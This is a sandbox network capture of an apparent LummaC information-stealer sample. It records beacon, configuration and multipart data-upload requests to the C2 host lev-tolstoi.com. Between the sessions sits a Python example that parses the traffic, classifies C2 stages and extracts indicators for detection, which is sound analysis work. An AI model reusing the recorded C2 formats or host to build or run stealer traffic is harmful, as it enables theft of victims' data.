                                                                                                                                                                                                                                                                  2024-12-23 06:09:21 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                                  Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49710 | 104.21.66.86 | 443 | 6480 | C:\Users\user\Desktop\tPSrcPbmRe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:09:22 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com
2024-12-23 06:09:22 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-23 06:09:23 UTC | 1119 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 06:09:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=43i6ulevmtcmcgks3d3bndp76k; expires=Thu, 17 Apr 2025 23:56:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkow8Zhr9qIfjxYwwLIQjYRRIwD60cOft5O33LMqIpvHFx3hg86Ye1YRY7%2FgRjsehUQRhYMvKd2xOSTqLwpmMd7YiumPz4XfuXy1Gsi2I6vvdWQsDKxvnQPeIA3LrvzFrFI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8f662eb85bc91a2c-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1807&rtt_var=705&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1522419&cwnd=174&unsent_bytes=0&cid=70c74e28ed672812&ts=765&x=0"
                                                                                                                                                                                                                                                                  2024-12-23 06:09:23 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                                                                                                                  2024-12-23 06:09:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49712 | 104.21.66.86 | 443 | 6480 | C:\Users\user\Desktop\tPSrcPbmRe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 06:09:24 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 47
Host: lev-tolstoi.com
2024-12-23 06:09:24 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-23 06:09:25 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 06:09:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ohsnqqnu7jnc71nvsi03ldak1u; expires=Thu, 17 Apr 2025 23:56:04 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kyIj6A3%2Bfh49YFsk4lENgqkXKjyFsTOtXyMV43NMj%2B%2Fh5HvQC0AN5TrxXJNoEtfcSeZ6Fo1ln5Rsatx6jz97VFVqx20yTKstCITxO%2BiaeKXQGORt%2FlwmEvopfn8HHVwKz1s%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f662ec4ec614235-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1551&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=946&delivery_rate=1782661&cwnd=248&unsent_bytes=0&cid=6cb3b2a5177abf8d&ts=790&x=0"
2024-12-23 06:09:25 UTC | 242 | IN | Data Raw: 34 36 62 0d 0a 36 7a 4f 71 2b 50 51 2f 6d 44 37 58 61 36 57 33 6d 4f 56 58 62 71 55 38 77 38 53 63 46 53 49 63 47 53 34 46 53 46 66 33 46 79 2b 51 45 64 7a 61 7a 67 75 30 48 4b 51 4f 68 34 33 73 6c 79 49 4c 69 52 36 69 6f 4c 34 76 52 48 31 31 58 57 42 6b 64 59 46 36 44 64 46 56 79 35 53 48 57 72 51 63 73 68 4f 48 6a 63 4f 65 64 51 76 4c 48 76 6e 6d 2b 58 39 41 66 58 56 4d 5a 43 4d 34 68 33 74 4d 67 31 2f 4e 6b 4a 46 63 2f 46 2b 37 42 73 44 53 2f 59 51 39 41 4d 78 52 71 36 6d 2b 4f 51 42 35 59 77 77 2f 61 68 71 53 59 30 36 6d 55 74 6d 54 31 6b 4b 30 52 66 55 4f 79 35 57 69 78 7a 59 4c 78 31 43 6c 6f 50 64 39 53 6e 52 39 54 57 45 69 4a 35 35 78 52 34 4e 52 7a 70 47 62 56 65 68 53 73 51 48 4c 31 50 65 45 64 55 4b 48 57
Data Ascii: 46b6zOq+PQ/mD7Xa6W3mOVXbqU8w8ScFSIcGS4FSFf3Fy+QEdzazgu0HKQOh43slyILiR6ioL4vRH11XWBkdYF6DdFVy5SHWrQcshOHjcOedQvLHvnm+X9AfXVMZCM4h3tMg1/NkJFc/F+7BsDS/YQ9AMxRq6m+OQB5Yww/ahqSY06mUtmT1kK0RfUOy5WixzYLx1CloPd9SnR9TWEiJ55xR4NRzpGbVehSsQHL1PeEdUKHW
2024-12-23 06:09:25 UTC | 896 | IN | Data Raw: 62 6e 6d 70 6a 63 54 54 48 68 64 64 6a 38 34 68 58 4d 4e 6c 68 2f 52 32 70 46 52 75 67 54 31 41 63 76 62 2f 34 51 36 43 38 5a 65 73 36 6e 2b 64 45 68 32 66 30 5a 6f 4a 54 71 62 66 30 71 42 57 4d 2b 56 6b 56 58 38 55 37 5a 4a 69 5a 58 39 6e 33 56 55 68 33 36 78 70 66 31 6a 54 57 38 37 55 79 6b 7a 64 5a 4a 35 44 64 45 52 7a 70 53 58 55 50 70 4f 76 51 4c 4d 30 4f 69 4d 50 41 48 4b 58 71 79 73 38 58 52 41 65 58 46 47 61 43 41 78 6d 48 68 4c 69 56 47 49 31 4e 5a 61 34 68 7a 74 53 65 54 51 36 6f 41 35 47 6f 56 6b 34 62 6d 77 62 67 42 35 64 77 77 2f 61 6a 32 51 64 6b 36 43 58 73 75 53 6e 55 2f 36 54 72 4d 45 77 73 66 38 67 6a 73 47 78 45 79 72 71 50 68 30 53 58 56 79 53 57 41 75 64 64 73 31 53 70 45 52 6b 4e 71 33 55 50 46 51 76 78 37 48 6c 65 58 4a 4c 45 7a 41
Data Ascii: bnmpjcTTHhddj84hXMNlh/R2pFRugT1Acvb/4Q6C8Zes6n+dEh2f0ZoJTqbf0qBWM+VkVX8U7ZJiZX9n3VUh36xpf1jTW87UykzdZJ5DdERzpSXUPpOvQLM0OiMPAHKXqys8XRAeXFGaCAxmHhLiVGI1NZa4hztSeTQ6oA5GoVk4bmwbgB5dww/aj2Qdk6CXsuSnU/6TrMEwsf8gjsGxEyrqPh0SXVySWAudds1SpERkNq3UPFQvx7HleXJLEzA
2024-12-23 06:09:25 UTC | 1369 | IN | Data Raw: 34 34 62 31 0d 0a 4a 55 4b 61 77 76 6d 67 4f 5a 7a 74 4c 61 32 70 74 31 58 70 43 68 6c 6e 49 6d 35 4a 51 2f 6c 32 34 42 63 37 57 39 6f 73 39 41 63 74 61 72 71 37 32 64 45 68 73 64 55 4a 68 4c 44 57 51 4e 51 50 4a 56 74 44 61 7a 68 33 65 55 71 49 64 7a 4a 66 50 68 44 73 43 77 45 6a 68 75 62 42 75 41 48 6c 33 44 44 39 71 4f 35 68 2b 51 59 35 59 79 5a 6d 57 56 2f 52 54 76 77 48 50 31 66 65 47 50 67 54 42 55 36 71 70 38 58 42 49 66 58 64 4a 61 69 6c 31 32 7a 56 4b 6b 52 47 51 32 72 4e 54 2b 55 32 6b 53 2f 4c 57 39 49 6b 79 47 6f 64 42 37 37 2b 2b 63 45 77 2b 49 77 78 74 4c 54 4b 52 65 45 65 4b 56 63 79 58 6d 56 54 7a 56 61 63 44 79 39 76 6f 69 6a 38 4a 79 56 4b 6b 71 66 35 32 51 58 42 78 52 79 64 6b 64 5a 4a 74 44 64 45 52 35 35 65 47 54 2f 42 58 70 45 76 79
Data Ascii: 44b1JUKawvmgOZztLa2pt1XpChlnIm5JQ/l24Bc7W9os9Actarq72dEhsdUJhLDWQNQPJVtDazh3eUqIdzJfPhDsCwEjhubBuAHl3DD9qO5h+QY5YyZmWV/RTvwHP1feGPgTBU6qp8XBIfXdJail12zVKkRGQ2rNT+U2kS/LW9IkyGodB77++cEw+IwxtLTKReEeKVcyXmVTzVacDy9voij8JyVKkqf52QXBxRydkdZJtDdER55eGT/BXpEvy
2024-12-23 06:09:25 UTC | 1369 | IN | Data Raw: 56 55 68 33 47 69 73 50 51 33 58 7a 42 69 44 47 41 6d 64 63 30 31 52 34 56 56 79 35 61 66 55 66 64 64 73 51 37 4b 30 66 71 42 4d 77 6e 47 56 61 6d 71 38 58 31 4d 65 6e 64 46 59 53 59 32 6c 6e 4d 4e 78 78 48 50 67 74 59 46 75 6e 32 34 41 73 76 56 2b 5a 59 79 54 49 6b 65 72 36 44 2b 4e 78 68 6f 61 31 74 67 4e 58 75 4d 4e 55 71 46 45 5a 44 61 6e 45 2f 2f 55 72 45 44 77 74 48 32 6a 54 55 4a 31 56 61 6e 6f 66 4a 2f 52 58 46 39 53 57 6f 74 50 70 5a 6e 58 34 70 56 78 70 62 57 45 37 70 62 72 55 6d 66 6c 64 2b 51 4e 68 7a 42 58 65 47 35 73 47 34 41 65 58 63 4d 50 32 6f 31 6d 33 6c 47 6a 6c 72 44 6e 70 4a 64 39 31 65 37 42 38 37 5a 38 6f 73 79 48 73 70 62 71 61 7a 33 63 6b 78 7a 65 46 35 6b 4b 33 58 62 4e 55 71 52 45 5a 44 61 73 57 37 4e 66 2f 55 57 69 63 79 36 67
Data Ascii: VUh3GisPQ3XzBiDGAmdc01R4VVy5afUfddsQ7K0fqBMwnGVamq8X1MendFYSY2lnMNxxHPgtYFun24AsvV+ZYyTIker6D+Nxhoa1tgNXuMNUqFEZDanE//UrEDwtH2jTUJ1VanofJ/RXF9SWotPpZnX4pVxpbWE7pbrUmfld+QNhzBXeG5sG4AeXcMP2o1m3lGjlrDnpJd91e7B87Z8osyHspbqaz3ckxzeF5kK3XbNUqREZDasW7Nf/UWicy6g
2024-12-23 06:09:25 UTC | 1369 | IN | Data Raw: 65 6a 61 58 78 66 41 42 68 4e 56 55 6e 4c 54 6e 56 4c 51 32 4f 57 63 43 55 6c 56 76 78 55 4c 6b 49 7a 74 50 2f 6a 7a 49 44 77 46 65 6d 70 76 68 6c 52 33 4e 79 54 47 77 6a 50 35 46 30 52 73 6b 66 69 4a 32 4f 48 61 49 63 68 77 37 52 78 66 6e 48 4b 6b 4c 65 48 71 61 71 76 69 38 41 63 32 6c 4e 59 6a 67 78 6d 6e 35 66 67 6c 66 49 6e 34 52 61 39 6c 61 36 43 73 2f 59 2b 59 38 6e 44 4d 70 65 73 37 54 34 66 45 34 2b 4e 51 78 67 4d 6e 58 4e 4e 58 79 65 57 6f 69 46 32 45 53 36 57 37 6c 4a 6e 35 58 35 6a 54 67 43 31 56 71 6e 72 66 31 35 53 48 74 7a 53 47 30 6e 4f 70 35 2f 52 49 46 52 78 35 2b 65 56 76 78 53 74 41 2f 4c 32 4c 72 4a 64 51 76 66 48 76 6e 6d 32 57 31 4e 65 47 78 64 55 69 30 31 78 44 56 53 78 30 69 49 6e 5a 6f 64 6f 68 79 34 42 63 33 59 2f 34 4d 39 43 38
Data Ascii: ejaXxfABhNVUnLTnVLQ2OWcCUlVvxULkIztP/jzIDwFempvhlR3NyTGwjP5F0RskfiJ2OHaIchw7RxfnHKkLeHqaqvi8Ac2lNYjgxmn5fglfIn4Ra9la6Cs/Y+Y8nDMpes7T4fE4+NQxgMnXNNXyeWoiF2ES6W7lJn5X5jTgC1Vqnrf15SHtzSG0nOp5/RIFRx5+eVvxStA/L2LrJdQvfHvnm2W1NeGxdUi01xDVSx0iInZodohy4Bc3Y/4M9C8
2024-12-23 06:09:25 UTC | 1369 | IN | Data Raw: 76 6e 42 4d 50 69 4d 4d 61 53 63 7a 6c 48 52 46 67 56 48 4f 6b 4a 4a 65 38 31 2b 79 41 4d 48 65 2b 59 30 36 43 38 46 61 6f 61 33 35 65 55 5a 37 63 45 55 6e 5a 48 57 53 62 51 33 52 45 65 36 35 68 45 2f 49 55 72 59 53 68 38 71 30 6e 6e 55 4c 79 78 37 35 35 76 56 2f 54 32 78 2b 52 57 38 75 50 4a 56 78 52 34 52 57 79 4a 2b 62 57 50 35 53 73 51 37 48 32 66 57 41 50 51 50 44 58 71 37 6d 73 44 64 48 5a 6a 73 55 4a 77 6f 2b 67 31 52 44 67 6b 4f 49 68 64 68 45 75 6c 75 35 53 5a 2b 56 39 49 34 30 42 4d 6c 53 71 61 4c 73 64 30 74 33 64 45 31 6f 4b 6a 61 55 66 30 57 62 56 38 69 52 6e 6c 72 79 57 4c 73 62 78 74 71 36 79 58 55 4c 33 78 37 35 35 73 39 68 52 33 6c 30 44 6b 34 74 4c 70 52 2f 54 6f 4a 64 69 49 58 59 52 4c 70 62 75 55 6d 66 6c 66 65 4c 4f 41 6a 56 55 71 47
Data Ascii: vnBMPiMMaSczlHRFgVHOkJJe81+yAMHe+Y06C8Faoa35eUZ7cEUnZHWSbQ3REe65hE/IUrYSh8q0nnULyx755vV/T2x+RW8uPJVxR4RWyJ+bWP5SsQ7H2fWAPQPDXq7msDdHZjsUJwo+g1RDgkOIhdhEulu5SZ+V9I40BMlSqaLsd0t3dE1oKjaUf0WbV8iRnlryWLsbxtq6yXUL3x755s9hR3l0Dk4tLpR/ToJdiIXYRLpbuUmflfeLOAjVUqG
2024-12-23 06:09:25 UTC | 1369 | IN | Data Raw: 44 35 77 51 6d 49 72 4f 5a 39 79 51 35 74 51 77 70 61 58 57 76 31 58 70 77 4c 56 33 76 4b 45 4f 77 54 4f 58 71 2b 6d 2f 33 70 41 50 6a 55 4d 59 44 4a 31 7a 54 56 6f 71 6b 62 65 6b 4e 52 2b 37 55 71 2f 44 73 76 44 38 59 59 32 47 73 70 4f 34 65 69 2b 5a 6b 64 76 4f 78 52 78 4f 69 4b 53 61 67 4f 51 45 63 2b 57 31 67 57 36 56 37 6f 48 79 74 37 2b 6a 6a 41 45 78 46 75 6b 72 50 4a 37 51 58 5a 79 52 6d 49 76 4d 35 39 32 51 34 5a 51 78 4a 36 66 55 2f 4d 63 2b 30 6e 41 7a 62 72 66 64 54 72 58 57 62 6d 72 37 6a 56 79 66 57 70 64 63 69 63 6c 6b 7a 64 69 69 6c 33 4c 6e 35 46 4e 75 6b 50 37 45 49 66 53 39 73 64 74 54 4d 64 61 72 61 58 35 65 55 39 7a 64 45 74 73 4a 54 2b 62 5a 30 4b 4d 57 63 53 53 6d 30 2f 77 56 71 63 41 7a 74 6a 30 6a 79 63 50 68 78 44 68 6f 65 59 33
Data Ascii: D5wQmIrOZ9yQ5tQwpaXWv1XpwLV3vKEOwTOXq+m/3pAPjUMYDJ1zTVoqkbekNR+7Uq/DsvD8YY2GspO4ei+ZkdvOxRxOiKSagOQEc+W1gW6V7oHyt7+jjAExFukrPJ7QXZyRmIvM592Q4ZQxJ6fU/Mc+0nAzbrfdTrXWbmr7jVyfWpdciclkzdiil3Ln5FNukP7EIfS9sdtTMdaraX5eU9zdEtsJT+bZ0KMWcSSm0/wVqcAztj0jycPhxDhoeY3
2024-12-23 06:09:25 UTC | 1369 | IN | Data Raw: 49 6c 47 79 4f 59 5a 55 36 4d 56 76 61 6b 6d 46 72 75 57 37 73 50 78 35 57 30 78 7a 70 4d 6e 32 66 68 37 72 35 49 44 6a 35 6a 44 44 39 71 41 4a 5a 37 51 34 35 48 32 64 65 31 53 75 78 57 72 6b 76 68 30 75 75 4f 49 77 48 56 48 75 2f 6d 2b 44 63 59 4c 6a 55 4d 59 7a 74 31 7a 53 55 66 30 67 53 62 7a 63 59 50 35 52 4b 73 53 64 47 56 6f 74 56 37 54 4e 55 65 2b 65 61 35 64 46 4a 73 66 55 39 78 4b 58 4b 72 53 32 32 43 52 38 6d 58 6e 56 48 45 59 71 41 4b 79 64 76 39 6b 53 52 4d 69 52 36 75 35 71 5a 4f 41 44 59 37 63 79 6c 71 4c 64 55 74 44 62 78 53 78 70 53 52 53 2b 73 52 6c 51 4c 52 31 50 65 4d 4f 55 37 47 55 37 47 68 76 6a 6b 41 65 44 73 55 4e 32 52 31 6b 57 51 4e 30 51 47 61 77 63 4d 4f 72 51 7a 6e 46 6f 6e 4d 75 70 46 31 56 4a 55 51 34 62 53 2b 4c 77 41 35 65
Data Ascii: IlGyOYZU6MVvakmFruW7sPx5W0xzpMn2fh7r5IDj5jDD9qAJZ7Q45H2de1SuxWrkvh0uuOIwHVHu/m+DcYLjUMYzt1zSUf0gSbzcYP5RKsSdGVotV7TNUe+ea5dFJsfU9xKXKrS22CR8mXnVHEYqAKydv9kSRMiR6u5qZOADY7cylqLdUtDbxSxpSRS+sRlQLR1PeMOU7GU7GhvjkAeDsUN2R1kWQN0QGawcMOrQznFonMupF1VJUQ4bS+LwA5e
2024-12-23 06:09:25 UTC | 1369 | IN | Data Raw: 32 68 48 5a 4e 67 68 47 47 32 70 41 64 6f 67 37 37 53 63 50 45 75 74 39 6c 58 70 77 4c 38 76 47 75 4a 56 38 77 59 67 78 78 61 6d 33 48 4f 77 32 62 45 5a 44 61 30 56 37 6f 54 72 4d 4b 30 64 61 39 75 51 73 71 78 46 6d 6e 70 66 42 67 55 54 78 55 54 32 77 6d 4f 5a 4a 6a 63 37 64 45 79 35 53 59 57 75 78 4e 39 55 65 48 32 72 72 66 44 45 7a 57 56 4b 62 71 74 6a 74 52 62 58 56 48 63 53 31 31 71 6a 73 4e 6b 52 47 51 32 71 4e 65 39 46 4b 79 48 39 61 59 33 49 51 79 43 73 52 51 74 72 65 2b 4f 51 42 34 4f 78 51 31 5a 48 57 52 5a 41 33 52 41 5a 72 42 77 77 36 74 44 4f 63 57 69 63 79 36 6b 58 56 55 6c 42 44 68 74 4c 34 76 41 44 6c 31 51 57 59 70 4f 35 5a 6e 58 34 39 53 33 70 6e 52 59 38 52 35 75 41 54 43 32 2f 32 35 43 79 33 4e 54 71 79 70 2b 55 6c 2b 53 57 70 4c 64 32
Data Ascii: 2hHZNghGG2pAdog77ScPEut9lXpwL8vGuJV8wYgxxam3HOw2bEZDa0V7oTrMK0da9uQsqxFmnpfBgUTxUT2wmOZJjc7dEy5SYWuxN9UeH2rrfDEzWVKbqtjtRbXVHcS11qjsNkRGQ2qNe9FKyH9aY3IQyCsRQtre+OQB4OxQ1ZHWRZA3RAZrBww6tDOcWicy6kXVUlBDhtL4vADl1QWYpO5ZnX49S3pnRY8R5uATC2/25Cy3NTqyp+Ul+SWpLd2
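The three sessions in this dump show the full LummaC C2 sequence against lev-tolstoi.com: a form-encoded "act=life" beacon that the server answers with a chunked "ok"; an "act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=" request answered with a large chunked blob (its first chunk header "46b" announces 0x46b = 1131 bytes, which is exactly why that chunk, plus its trailing CRLF, fills the 242-byte and 896-byte IN records before the next chunk header "44b1" appears); and, in session 3, a multipart/form-data upload of 12859 bytes to the same /api path. The Python below is an added example and is not part of the Joe Sandbox report or of the sample's code: it rebuilds the recorded requests and chunk bytes from the dump, de-chunks the replies while coping with the truncated capture, classifies each request by C2 stage and pulls the host and lid value out as indicators. The stage labels and the reading of "lid" as a per-build identifier are this example's assumptions, not something the report states.

```python
"""Added example (not from the Joe Sandbox report or the sample): parse the
recorded LummaC C2 exchange, de-chunk the replies and flag each stage.
Request texts and chunk bytes are copied from the dump; stage labels and the
reading of 'lid' as a per-build identifier are this example's assumptions."""
from typing import Optional, Tuple
from urllib.parse import parse_qs

LUMMA_STAGES = {  # 'act=' values seen in the dump
    "life": "beacon (liveness check; server answers 'ok')",
    "recive_message": "configuration download (action name misspelled by the malware)",
}


def parse_data_raw(hex_dump: str) -> bytes:
    """Turn a report 'Data Raw' line ('32 0d 0a 6f 6b 0d 0a') back into bytes."""
    return bytes.fromhex(hex_dump.replace(" ", ""))


def dechunk(body: bytes) -> Tuple[bytes, bool]:
    """Decode HTTP/1.1 chunked transfer encoding; returns (payload, complete).
    complete is False when data ends before the zero-length terminating chunk."""
    out, pos = bytearray(), 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            return bytes(out), False
        try:
            size = int(body[pos:end].split(b";")[0].strip(), 16)  # drop chunk extensions
        except ValueError:
            return bytes(out), False
        pos = end + 2
        if size == 0:
            return bytes(out), True
        chunk = body[pos:pos + size]
        out += chunk
        if len(chunk) < size:  # capture stopped inside this chunk
            return bytes(out), False
        pos += size + 2  # skip the CRLF that follows the chunk data


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path = lines[0].split(" ", 2)[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def classify_lumma_request(raw: str) -> Optional[dict]:
    """Return stage and extracted fields for a Lumma-style POST /api, else None."""
    req = parse_http_request(raw)
    headers = req["headers"]
    if req["method"] != "POST" or req["path"] != "/api":
        return None
    ctype = headers.get("content-type", "")
    hit = {"host": headers.get("host"), "stage": None, "fields": {}, "length_ok": None}
    if ctype.startswith("application/x-www-form-urlencoded"):
        fields = {k: v[0] for k, v in parse_qs(req["body"], keep_blank_values=True).items()}
        if fields.get("act") not in LUMMA_STAGES:
            return None
        hit["stage"], hit["fields"] = LUMMA_STAGES[fields["act"]], fields
    elif ctype.startswith("multipart/form-data") and "boundary=" in ctype:
        hit["stage"] = "exfiltration (multipart/form-data upload)"  # session 3 pattern
        hit["fields"] = {"boundary": ctype.split("boundary=", 1)[1],
                         "content_length": int(headers.get("content-length", "0"))}
    else:
        return None
    declared = headers.get("content-length")
    if declared is not None and req["body"]:  # declared length vs. actual body
        hit["length_ok"] = int(declared) == len(req["body"].encode())
    return hit


def extract_iocs(*requests: str) -> dict:
    """Collect C2 hosts, lid values and the observed stage sequence."""
    iocs = {"hosts": set(), "lids": set(), "stages": []}
    for hit in filter(None, map(classify_lumma_request, requests)):
        iocs["hosts"].add(hit["host"])
        iocs["stages"].append(hit["stage"])
        if "lid" in hit["fields"]:
            iocs["lids"].add(hit["fields"]["lid"])
    return iocs


# Header order as the dump shows it; bodies copied from sessions 1-3 (the multipart
# body itself is not present in the dump, so REQ_EXFIL carries headers only).
HDRS = ("POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: {ctype}\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
        "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
        "Content-Length: {length}\r\nHost: lev-tolstoi.com\r\n\r\n{body}")
REQ_LIFE = HDRS.format(ctype="application/x-www-form-urlencoded", length=8, body="act=life")
REQ_CONFIG = HDRS.format(ctype="application/x-www-form-urlencoded", length=47,
                         body="act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=")
REQ_EXFIL = HDRS.format(ctype="multipart/form-data; boundary=QA0GZX9INMITFNAV1T",
                        length=12859, body="")
# Beacon reply (both IN records) and the opening bytes of the truncated config reply.
BEACON_REPLY = parse_data_raw("32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a")
CONFIG_REPLY_HEAD = parse_data_raw("34 36 62 0d 0a 36 7a 4f 71 2b 50 51 2f")
```

dechunk(BEACON_REPLY) yields (b"ok", True), while dechunk(CONFIG_REPLY_HEAD) yields (b"6zOq+PQ/", False) because chunk 0x46b is cut short in the excerpt; extract_iocs(REQ_LIFE, REQ_CONFIG, REQ_EXFIL) returns the host and the lid with all three stages in order. One caveat for anyone turning this into a network detection: the session tables show destination port 443, so on the wire this exchange is inside TLS and the plaintext here is what the sandbox observed after interception. The same matching in production needs a TLS-terminating proxy or host-side telemetry; at the network edge only the TLS metadata and the destination are visible.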


Session ID: 3
Source IP: 192.168.2.6
Source Port: 49718
Destination IP: 104.21.66.86
Destination Port: 443
PID: 6480
Process: C:\Users\user\Desktop\tPSrcPbmRe.exe

Timestamp  Bytes transferred  Direction  Data
2024-12-23 06:09:27 UTC  281 bytes  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=QA0GZX9INMITFNAV1T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12859
Host: lev-tolstoi.com
2024-12-23 06:09:27 UTC  12859 bytes  OUT
Data Ascii:
--QA0GZX9INMITFNAV1T
Content-Disposition: form-data; name="hwid"

5590FA6BE29EBA19AC8923850305D13E
--QA0GZX9INMITFNAV1T
Content-Disposition: form-data; name="pid"

2
--QA0GZX9INMITFNAV1T
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
2024-12-23 06:09:28 UTC  1127 bytes  IN  HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 06:09:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=v0v5dh5kc774jtar4ia3qlq8dr; expires=Thu, 17 Apr 2025 23:56:06 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T4gbhtYz2z5Mb1olwpHVv0JrjqCDW6uKODfKAGtBhTUqJfJpK%2Fp%2FNs2Is7%2Fjg31ONmQlNmPzQRjU0XXttMNXmmrsl1JlI0xK8xJ23Wk1YPVzkl2ynfElibDtH2tuxxGwV3s%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f662ed3683e4376-EWR
alt-svc: h3=":443"; ma=86400
